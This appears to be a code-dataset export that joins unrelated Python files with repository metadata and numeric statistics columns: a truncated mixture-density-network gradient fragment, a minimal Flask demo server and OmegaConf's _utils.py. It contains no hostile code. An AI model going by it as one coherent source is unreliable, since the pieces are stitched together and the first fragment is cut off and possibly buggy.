#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
# Add grad_clipping here if it explodes P.23
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
| 40.260274
| 142
| 0.576613
| 1,480
| 8,817
| 3.098649
| 0.128378
| 0.074575
| 0.051897
| 0.032708
| 0.35543
| 0.305495
| 0.245312
| 0.210641
| 0.178151
| 0.146751
| 0
| 0.052769
| 0.303618
| 8,817
| 218
| 143
| 40.444954
| 0.694137
| 0.229103
| 0
| 0.077519
| 0
| 0.015504
| 0.032969
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0.007752
| 0.054264
| 0
| 0.131783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134809d310a2c2bc00124d8b1a5104d5d2cb92b6
| 939
|
py
|
Python
|
flask__webservers/bootstrap_4__toggle_switch__examples/main.py
|
DazEB2/SimplePyScripts
|
1dde0a42ba93fe89609855d6db8af1c63b1ab7cc
|
[
"CC-BY-4.0"
] | null | null | null |
flask__webservers/bootstrap_4__toggle_switch__examples/main.py
|
DazEB2/SimplePyScripts
|
1dde0a42ba93fe89609855d6db8af1c63b1ab7cc
|
[
"CC-BY-4.0"
] | null | null | null |
flask__webservers/bootstrap_4__toggle_switch__examples/main.py
|
DazEB2/SimplePyScripts
|
1dde0a42ba93fe89609855d6db8af1c63b1ab7cc
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://github.com/twbs/bootstrap
# SOURCE: https://github.com/gitbrent/bootstrap4-toggle
# SOURCE: https://gitbrent.github.io/bootstrap4-toggle/
from flask import Flask, render_template
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
@app.route("/")
def index():
return render_template('index.html')
if __name__ == '__main__':
app.debug = True
# Localhost
# port=0 -- random free port
# app.run(port=0)
app.run(
port=5000,
# :param threaded: should the process handle each request in a separate
# thread?
# :param processes: if greater than 1 then handle each request in a new process
# up to this maximum number of concurrent processes.
threaded=True,
)
# # Public IP
# app.run(host='0.0.0.0')
| 22.357143
| 87
| 0.631523
| 119
| 939
| 4.831933
| 0.613445
| 0.057391
| 0.05913
| 0.069565
| 0.069565
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021216
| 0.247071
| 939
| 41
| 88
| 22.902439
| 0.792079
| 0.556976
| 0
| 0
| 0
| 0
| 0.067332
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.142857
| 0.071429
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13495c72390c53605e37531f81078eacc3f25cd2
| 30,078
|
py
|
Python
|
omegaconf/_utils.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 1,091
|
2018-09-06T17:27:12.000Z
|
2022-03-31T13:47:45.000Z
|
omegaconf/_utils.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 624
|
2019-06-11T20:53:19.000Z
|
2022-03-30T20:44:25.000Z
|
omegaconf/_utils.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 71
|
2019-06-14T05:32:45.000Z
|
2022-03-27T19:52:35.000Z
|
import copy
import os
import re
import string
import sys
import warnings
from contextlib import contextmanager
from enum import Enum
from textwrap import dedent
from typing import (
Any,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
get_type_hints,
)
import yaml
from .errors import (
ConfigIndexError,
ConfigTypeError,
ConfigValueError,
GrammarParseError,
OmegaConfBaseException,
ValidationError,
)
from .grammar_parser import SIMPLE_INTERPOLATION_PATTERN, parse
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None # type: ignore # pragma: no cover
try:
import attr
except ImportError: # pragma: no cover
attr = None # type: ignore # pragma: no cover
# Regexprs to match key paths like: a.b, a[b], ..a[c].d, etc.
# We begin by matching the head (in these examples: a, a, ..a).
# This can be read as "dots followed by any character but `.` or `[`"
# Note that a key starting with brackets, like [a], is purposedly *not*
# matched here and will instead be handled in the next regex below (this
# is to keep this regex simple).
KEY_PATH_HEAD = re.compile(r"(\.)*[^.[]*")
# Then we match other keys. The following expression matches one key and can
# be read as a choice between two syntaxes:
# - `.` followed by anything except `.` or `[` (ex: .b, .d)
# - `[` followed by anything then `]` (ex: [b], [c])
KEY_PATH_OTHER = re.compile(r"\.([^.[]*)|\[(.*?)\]")
# source: https://yaml.org/type/bool.html
YAML_BOOL_TYPES = [
"y",
"Y",
"yes",
"Yes",
"YES",
"n",
"N",
"no",
"No",
"NO",
"true",
"True",
"TRUE",
"false",
"False",
"FALSE",
"on",
"On",
"ON",
"off",
"Off",
"OFF",
]
class Marker:
def __init__(self, desc: str):
self.desc = desc
def __repr__(self) -> str:
return self.desc
# To be used as default value when `None` is not an option.
_DEFAULT_MARKER_: Any = Marker("_DEFAULT_MARKER_")
class OmegaConfDumper(yaml.Dumper): # type: ignore
str_representer_added = False
@staticmethod
def str_representer(dumper: yaml.Dumper, data: str) -> yaml.ScalarNode:
with_quotes = yaml_is_bool(data) or is_int(data) or is_float(data)
return dumper.represent_scalar(
yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG,
data,
style=("'" if with_quotes else None),
)
def get_omega_conf_dumper() -> Type[OmegaConfDumper]:
if not OmegaConfDumper.str_representer_added:
OmegaConfDumper.add_representer(str, OmegaConfDumper.str_representer)
OmegaConfDumper.str_representer_added = True
return OmegaConfDumper
def yaml_is_bool(b: str) -> bool:
return b in YAML_BOOL_TYPES
def get_yaml_loader() -> Any:
class OmegaConfLoader(yaml.SafeLoader): # type: ignore
def construct_mapping(self, node: yaml.Node, deep: bool = False) -> Any:
keys = set()
for key_node, value_node in node.value:
if key_node.tag != yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG:
continue
if key_node.value in keys:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
f"found duplicate key {key_node.value}",
key_node.start_mark,
)
keys.add(key_node.value)
return super().construct_mapping(node, deep=deep)
loader = OmegaConfLoader
loader.add_implicit_resolver(
"tag:yaml.org,2002:float",
re.compile(
"""^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$""",
re.X,
),
list("-+0123456789."),
)
loader.yaml_implicit_resolvers = {
key: [
(tag, regexp)
for tag, regexp in resolvers
if tag != "tag:yaml.org,2002:timestamp"
]
for key, resolvers in loader.yaml_implicit_resolvers.items()
}
return loader
def _get_class(path: str) -> type:
from importlib import import_module
module_path, _, class_name = path.rpartition(".")
mod = import_module(module_path)
try:
klass: type = getattr(mod, class_name)
except AttributeError:
raise ImportError(f"Class {class_name} is not in module {module_path}")
return klass
def _is_union(type_: Any) -> bool:
return getattr(type_, "__origin__", None) is Union
def _resolve_optional(type_: Any) -> Tuple[bool, Any]:
"""Check whether `type_` is equivalent to `typing.Optional[T]` for some T."""
if getattr(type_, "__origin__", None) is Union:
args = type_.__args__
if len(args) == 2 and args[1] == type(None): # noqa E721
return True, args[0]
if type_ is Any:
return True, Any
return False, type_
def _is_optional(obj: Any, key: Optional[Union[int, str]] = None) -> bool:
"""Check `obj` metadata to see if the given node is optional."""
from .base import Container, Node
if key is not None:
assert isinstance(obj, Container)
obj = obj._get_node(key)
if isinstance(obj, Node):
return obj._is_optional()
else:
# In case `obj` is not a Node, treat it as optional by default.
# This is used in `ListConfig.append` and `ListConfig.insert`
# where the appended/inserted value might or might not be a Node.
return True
def _resolve_forward(type_: Type[Any], module: str) -> Type[Any]:
import typing # lgtm [py/import-and-import-from]
forward = typing.ForwardRef if hasattr(typing, "ForwardRef") else typing._ForwardRef # type: ignore
if type(type_) is forward:
return _get_class(f"{module}.{type_.__forward_arg__}")
else:
if is_dict_annotation(type_):
kt, vt = get_dict_key_value_types(type_)
if kt is not None:
kt = _resolve_forward(kt, module=module)
if vt is not None:
vt = _resolve_forward(vt, module=module)
return Dict[kt, vt] # type: ignore
if is_list_annotation(type_):
et = get_list_element_type(type_)
if et is not None:
et = _resolve_forward(et, module=module)
return List[et] # type: ignore
return type_
def extract_dict_subclass_data(obj: Any, parent: Any) -> Optional[Dict[str, Any]]:
"""Check if obj is an instance of a subclass of Dict. If so, extract the Dict keys/values."""
from omegaconf.omegaconf import _maybe_wrap
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
subclasses_dict = is_dict_subclass(obj_type)
if subclasses_dict:
warnings.warn(
f"Class `{obj_type.__name__}` subclasses `Dict`."
+ " Subclassing `Dict` in Structured Config classes is deprecated,"
+ " see github.com/omry/omegaconf/issues/663",
UserWarning,
stacklevel=9,
)
if is_type:
return None
elif subclasses_dict:
dict_subclass_data = {}
key_type, element_type = get_dict_key_value_types(obj_type)
for name, value in obj.items():
is_optional, type_ = _resolve_optional(element_type)
type_ = _resolve_forward(type_, obj.__module__)
try:
dict_subclass_data[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=parent,
)
except ValidationError as ex:
format_and_raise(
node=None, key=name, value=value, cause=ex, msg=str(ex)
)
return dict_subclass_data
else:
return None
def get_attr_class_field_names(obj: Any) -> List[str]:
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
return list(attr.fields_dict(obj_type))
def get_attr_data(obj: Any, allow_objects: Optional[bool] = None) -> Dict[str, Any]:
from omegaconf.omegaconf import OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
from omegaconf import MISSING
d = {}
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
for name, attrib in attr.fields_dict(obj_type).items():
is_optional, type_ = _resolve_optional(attrib.type)
type_ = _resolve_forward(type_, obj.__module__)
if not is_type:
value = getattr(obj, name)
else:
value = attrib.default
if value == attr.NOTHING:
value = MISSING
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def get_dataclass_field_names(obj: Any) -> List[str]:
return [field.name for field in dataclasses.fields(obj)]
def get_dataclass_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
d = {}
obj_type = get_type_of(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
resolved_hints = get_type_hints(obj_type)
for field in dataclasses.fields(obj):
name = field.name
is_optional, type_ = _resolve_optional(resolved_hints[field.name])
type_ = _resolve_forward(type_, obj.__module__)
if hasattr(obj, name):
value = getattr(obj, name)
if value == dataclasses.MISSING:
value = MISSING
else:
if field.default_factory == dataclasses.MISSING: # type: ignore
value = MISSING
else:
value = field.default_factory() # type: ignore
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def is_dataclass(obj: Any) -> bool:
from omegaconf.base import Node
if dataclasses is None or isinstance(obj, Node):
return False
return dataclasses.is_dataclass(obj)
def is_attr_class(obj: Any) -> bool:
from omegaconf.base import Node
if attr is None or isinstance(obj, Node):
return False
return attr.has(obj)
def is_structured_config(obj: Any) -> bool:
return is_attr_class(obj) or is_dataclass(obj)
def is_dataclass_frozen(type_: Any) -> bool:
return type_.__dataclass_params__.frozen # type: ignore
def is_attr_frozen(type_: type) -> bool:
# This is very hacky and probably fragile as well.
# Unfortunately currently there isn't an official API in attr that can detect that.
# noinspection PyProtectedMember
return type_.__setattr__ == attr._make._frozen_setattrs # type: ignore
def get_type_of(class_or_object: Any) -> Type[Any]:
type_ = class_or_object
if not isinstance(type_, type):
type_ = type(class_or_object)
assert isinstance(type_, type)
return type_
def is_structured_config_frozen(obj: Any) -> bool:
type_ = get_type_of(obj)
if is_dataclass(type_):
return is_dataclass_frozen(type_)
if is_attr_class(type_):
return is_attr_frozen(type_)
return False
def get_structured_config_field_names(obj: Any) -> List[str]:
if is_dataclass(obj):
return get_dataclass_field_names(obj)
elif is_attr_class(obj):
return get_attr_class_field_names(obj)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
def get_structured_config_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
if is_dataclass(obj):
return get_dataclass_data(obj, allow_objects=allow_objects)
elif is_attr_class(obj):
return get_attr_data(obj, allow_objects=allow_objects)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
class ValueKind(Enum):
VALUE = 0
MANDATORY_MISSING = 1
INTERPOLATION = 2
def _is_missing_value(value: Any) -> bool:
from omegaconf import Node
if isinstance(value, Node):
value = value._value()
return _is_missing_literal(value)
def _is_missing_literal(value: Any) -> bool:
# Uses literal '???' instead of the MISSING const for performance reasons.
return isinstance(value, str) and value == "???"
def _is_none(
value: Any, resolve: bool = False, throw_on_resolution_failure: bool = True
) -> bool:
from omegaconf import Node
if not isinstance(value, Node):
return value is None
if resolve:
value = value._maybe_dereference_node(
throw_on_resolution_failure=throw_on_resolution_failure
)
if not throw_on_resolution_failure and value is None:
# Resolution failure: consider that it is *not* None.
return False
assert isinstance(value, Node)
return value._is_none()
def get_value_kind(
value: Any, strict_interpolation_validation: bool = False
) -> ValueKind:
"""
Determine the kind of a value
Examples:
VALUE: "10", "20", True
MANDATORY_MISSING: "???"
INTERPOLATION: "${foo.bar}", "${foo.${bar}}", "${foo:bar}", "[${foo}, ${bar}]",
"ftp://${host}/path", "${foo:${bar}, [true], {'baz': ${baz}}}"
:param value: Input to classify.
:param strict_interpolation_validation: If `True`, then when `value` is a string
containing "${", it is parsed to validate the interpolation syntax. If `False`,
this parsing step is skipped: this is more efficient, but will not detect errors.
"""
if _is_missing_value(value):
return ValueKind.MANDATORY_MISSING
value = _get_value(value)
# We identify potential interpolations by the presence of "${" in the string.
# Note that escaped interpolations (ex: "esc: \${bar}") are identified as
# interpolations: this is intended, since they must be processed as interpolations
# for the string to be properly un-escaped.
# Keep in mind that invalid interpolations will only be detected when
# `strict_interpolation_validation` is True.
if isinstance(value, str) and "${" in value:
if strict_interpolation_validation:
# First try the cheap regex matching that detects common interpolations.
if SIMPLE_INTERPOLATION_PATTERN.match(value) is None:
# If no match, do the more expensive grammar parsing to detect errors.
parse(value)
return ValueKind.INTERPOLATION
else:
return ValueKind.VALUE
# DEPRECATED: remove in 2.2
def is_bool(st: str) -> bool:
st = str.lower(st)
return st == "true" or st == "false"
def is_float(st: str) -> bool:
try:
float(st)
return True
except ValueError:
return False
def is_int(st: str) -> bool:
try:
int(st)
return True
except ValueError:
return False
# DEPRECATED: remove in 2.2
def decode_primitive(s: str) -> Any:
if is_bool(s):
return str.lower(s) == "true"
if is_int(s):
return int(s)
if is_float(s):
return float(s)
return s
def is_primitive_list(obj: Any) -> bool:
from .base import Container
return not isinstance(obj, Container) and isinstance(obj, (list, tuple))
def is_primitive_dict(obj: Any) -> bool:
t = get_type_of(obj)
return t is dict
def is_dict_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Dict or type_ is Dict # pragma: no cover
else: # pragma: no cover
# type_dict is a bit hard to detect.
# this support is tentative, if it eventually causes issues in other areas it may be dropped.
typed_dict = hasattr(type_, "__base__") and type_.__base__ == dict
return origin is dict or typed_dict
def is_list_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is List or type_ is List # pragma: no cover
else:
return origin is list # pragma: no cover
def is_tuple_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Tuple or type_ is Tuple # pragma: no cover
else:
return origin is tuple # pragma: no cover
def is_dict_subclass(type_: Any) -> bool:
return type_ is not None and isinstance(type_, type) and issubclass(type_, Dict)
def is_dict(obj: Any) -> bool:
return is_primitive_dict(obj) or is_dict_annotation(obj) or is_dict_subclass(obj)
def is_primitive_container(obj: Any) -> bool:
return is_primitive_list(obj) or is_primitive_dict(obj)
def get_list_element_type(ref_type: Optional[Type[Any]]) -> Any:
args = getattr(ref_type, "__args__", None)
if ref_type is not List and args is not None and args[0]:
element_type = args[0]
else:
element_type = Any
return element_type
def get_dict_key_value_types(ref_type: Any) -> Tuple[Any, Any]:
args = getattr(ref_type, "__args__", None)
if args is None:
bases = getattr(ref_type, "__orig_bases__", None)
if bases is not None and len(bases) > 0:
args = getattr(bases[0], "__args__", None)
key_type: Any
element_type: Any
if ref_type is None or ref_type == Dict:
key_type = Any
element_type = Any
else:
if args is not None:
key_type = args[0]
element_type = args[1]
else:
key_type = Any
element_type = Any
return key_type, element_type
def valid_value_annotation_type(type_: Any) -> bool:
return type_ is Any or is_primitive_type(type_) or is_structured_config(type_)
def _valid_dict_key_annotation_type(type_: Any) -> bool:
from omegaconf import DictKeyType
return type_ is None or type_ is Any or issubclass(type_, DictKeyType.__args__) # type: ignore
def is_primitive_type(type_: Any) -> bool:
type_ = get_type_of(type_)
return issubclass(type_, Enum) or type_ in (int, float, bool, str, type(None))
def _is_interpolation(v: Any, strict_interpolation_validation: bool = False) -> bool:
if isinstance(v, str):
ret = (
get_value_kind(v, strict_interpolation_validation)
== ValueKind.INTERPOLATION
)
assert isinstance(ret, bool)
return ret
return False
def _get_value(value: Any) -> Any:
from .base import Container
from .nodes import ValueNode
if isinstance(value, ValueNode):
return value._value()
elif isinstance(value, Container):
boxed = value._value()
if boxed is None or _is_missing_literal(boxed) or _is_interpolation(boxed):
return boxed
# return primitives and regular OmegaConf Containers as is
return value
def get_ref_type(obj: Any, key: Any = None) -> Optional[Type[Any]]:
from omegaconf import Container, Node
if isinstance(obj, Container):
if key is not None:
obj = obj._get_node(key)
else:
if key is not None:
raise ValueError("Key must only be provided when obj is a container")
if isinstance(obj, Node):
ref_type = obj._metadata.ref_type
if obj._is_optional() and ref_type is not Any:
return Optional[ref_type] # type: ignore
else:
return ref_type
else:
return Any # type: ignore
def _raise(ex: Exception, cause: Exception) -> None:
# Set the environment variable OC_CAUSE=1 to get a stacktrace that includes the
# causing exception.
env_var = os.environ["OC_CAUSE"] if "OC_CAUSE" in os.environ else None
debugging = sys.gettrace() is not None
full_backtrace = (debugging and not env_var == "0") or (env_var == "1")
if full_backtrace:
ex.__cause__ = cause
else:
ex.__cause__ = None
raise ex.with_traceback(sys.exc_info()[2]) # set end OC_CAUSE=1 for full backtrace
def format_and_raise(
node: Any,
key: Any,
value: Any,
msg: str,
cause: Exception,
type_override: Any = None,
) -> None:
from omegaconf import OmegaConf
from omegaconf.base import Node
if isinstance(cause, AssertionError):
raise
if isinstance(cause, OmegaConfBaseException) and cause._initialized:
ex = cause
if type_override is not None:
ex = type_override(str(cause))
ex.__dict__ = copy.deepcopy(cause.__dict__)
_raise(ex, cause)
object_type: Optional[Type[Any]]
object_type_str: Optional[str] = None
ref_type: Optional[Type[Any]]
ref_type_str: Optional[str]
child_node: Optional[Node] = None
if node is None:
full_key = key if key is not None else ""
object_type = None
ref_type = None
ref_type_str = None
else:
if key is not None and not node._is_none():
child_node = node._get_node(key, validate_access=False)
try:
full_key = node._get_full_key(key=key)
except Exception as exc:
# Since we are handling an exception, raising a different one here would
# be misleading. Instead, we display it in the key.
full_key = f"<unresolvable due to {type(exc).__name__}: {exc}>"
object_type = OmegaConf.get_type(node)
object_type_str = type_str(object_type)
ref_type = get_ref_type(node)
ref_type_str = type_str(ref_type)
msg = string.Template(msg).safe_substitute(
REF_TYPE=ref_type_str,
OBJECT_TYPE=object_type_str,
KEY=key,
FULL_KEY=full_key,
VALUE=value,
VALUE_TYPE=type_str(type(value), include_module_name=True),
KEY_TYPE=f"{type(key).__name__}",
)
if ref_type not in (None, Any):
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
reference_type=$REF_TYPE
object_type=$OBJECT_TYPE"""
)
else:
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
object_type=$OBJECT_TYPE"""
)
s = string.Template(template=template)
message = s.substitute(
REF_TYPE=ref_type_str, OBJECT_TYPE=object_type_str, MSG=msg, FULL_KEY=full_key
)
exception_type = type(cause) if type_override is None else type_override
if exception_type == TypeError:
exception_type = ConfigTypeError
elif exception_type == IndexError:
exception_type = ConfigIndexError
ex = exception_type(f"{message}")
if issubclass(exception_type, OmegaConfBaseException):
ex._initialized = True
ex.msg = message
ex.parent_node = node
ex.child_node = child_node
ex.key = key
ex.full_key = full_key
ex.value = value
ex.object_type = object_type
ex.object_type_str = object_type_str
ex.ref_type = ref_type
ex.ref_type_str = ref_type_str
_raise(ex, cause)
def type_str(t: Any, include_module_name: bool = False) -> str:
is_optional, t = _resolve_optional(t)
if t is None:
return type(t).__name__
if t is Any:
return "Any"
if t is ...:
return "..."
if sys.version_info < (3, 7, 0): # pragma: no cover
# Python 3.6
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t.__origin__ is not None:
name = type_str(t.__origin__)
else:
name = str(t)
if name.startswith("typing."):
name = name[len("typing.") :]
else: # pragma: no cover
# Python >= 3.7
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t._name is None:
if t.__origin__ is not None:
name = type_str(
t.__origin__, include_module_name=include_module_name
)
else:
name = str(t._name)
args = getattr(t, "__args__", None)
if args is not None:
args = ", ".join(
[type_str(t, include_module_name=include_module_name) for t in t.__args__]
)
ret = f"{name}[{args}]"
else:
ret = name
if include_module_name:
if (
hasattr(t, "__module__")
and t.__module__ != "builtins"
and t.__module__ != "typing"
and not t.__module__.startswith("omegaconf.")
):
module_prefix = t.__module__ + "."
else:
module_prefix = ""
ret = module_prefix + ret
if is_optional:
return f"Optional[{ret}]"
else:
return ret
def _ensure_container(target: Any, flags: Optional[Dict[str, bool]] = None) -> Any:
from omegaconf import OmegaConf
if is_primitive_container(target):
assert isinstance(target, (list, dict))
target = OmegaConf.create(target, flags=flags)
elif is_structured_config(target):
target = OmegaConf.structured(target, flags=flags)
elif not OmegaConf.is_config(target):
raise ValueError(
"Invalid input. Supports one of "
+ "[dict,list,DictConfig,ListConfig,dataclass,dataclass instance,attr class,attr class instance]"
)
return target
def is_generic_list(type_: Any) -> bool:
"""
Checks if a type is a generic list, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_list_annotation(type_) and get_list_element_type(type_) is not None
def is_generic_dict(type_: Any) -> bool:
"""
Checks if a type is a generic dict, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_dict_annotation(type_) and len(get_dict_key_value_types(type_)) > 0
def is_container_annotation(type_: Any) -> bool:
return is_list_annotation(type_) or is_dict_annotation(type_)
def split_key(key: str) -> List[str]:
"""
Split a full key path into its individual components.
This is similar to `key.split(".")` but also works with the getitem syntax:
"a.b" -> ["a", "b"]
"a[b]" -> ["a, "b"]
".a.b[c].d" -> ["", "a", "b", "c", "d"]
"[a].b" -> ["a", "b"]
"""
# Obtain the first part of the key (in docstring examples: a, a, .a, '')
first = KEY_PATH_HEAD.match(key)
assert first is not None
first_stop = first.span()[1]
# `tokens` will contain all elements composing the key.
tokens = key[0:first_stop].split(".")
# Optimization in case `key` has no other component: we are done.
if first_stop == len(key):
return tokens
if key[first_stop] == "[" and not tokens[-1]:
# This is a special case where the first key starts with brackets, e.g.
# [a] or ..[a]. In that case there is an extra "" in `tokens` that we
# need to get rid of:
# [a] -> tokens = [""] but we would like []
# ..[a] -> tokens = ["", "", ""] but we would like ["", ""]
tokens.pop()
# Identify other key elements (in docstring examples: b, b, b/c/d, b)
others = KEY_PATH_OTHER.findall(key[first_stop:])
# There are two groups in the `KEY_PATH_OTHER` regex: one for keys starting
# with a dot (.b, .d) and one for keys starting with a bracket ([b], [c]).
# Only one group can be non-empty.
tokens += [dot_key if dot_key else bracket_key for dot_key, bracket_key in others]
return tokens
# Similar to Python 3.7+'s `contextlib.nullcontext` (which should be used instead,
# once support for Python 3.6 is dropped).
@contextmanager
def nullcontext(enter_result: Any = None) -> Iterator[Any]:
yield enter_result
| 30.849231
| 109
| 0.619423
| 3,937
| 30,078
| 4.488951
| 0.128524
| 0.013863
| 0.012222
| 0.001811
| 0.303288
| 0.257568
| 0.186726
| 0.160358
| 0.156284
| 0.136253
| 0
| 0.004698
| 0.27821
| 30,078
| 974
| 110
| 30.880903
| 0.809351
| 0.159618
| 0
| 0.26003
| 0
| 0.001486
| 0.048523
| 0.008652
| 0
| 0
| 0
| 0
| 0.010401
| 1
| 0.087667
| false
| 0
| 0.056464
| 0.019316
| 0.291233
| 0
| 0
| 0
